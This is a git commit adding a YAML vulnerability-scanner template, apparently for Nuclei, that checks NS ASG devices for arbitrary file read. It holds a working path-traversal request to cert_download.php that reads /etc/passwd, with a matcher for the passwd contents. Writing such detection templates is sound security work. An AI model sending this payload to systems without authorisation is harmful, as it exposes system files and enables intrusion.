commit
2685f492ed
|
@ -0,0 +1,23 @@
|
|||
id: nsasg-arbitrary-file-read
|
||||
|
||||
info:
|
||||
name: NS ASG Arbitrary File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
tags: nsasg,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue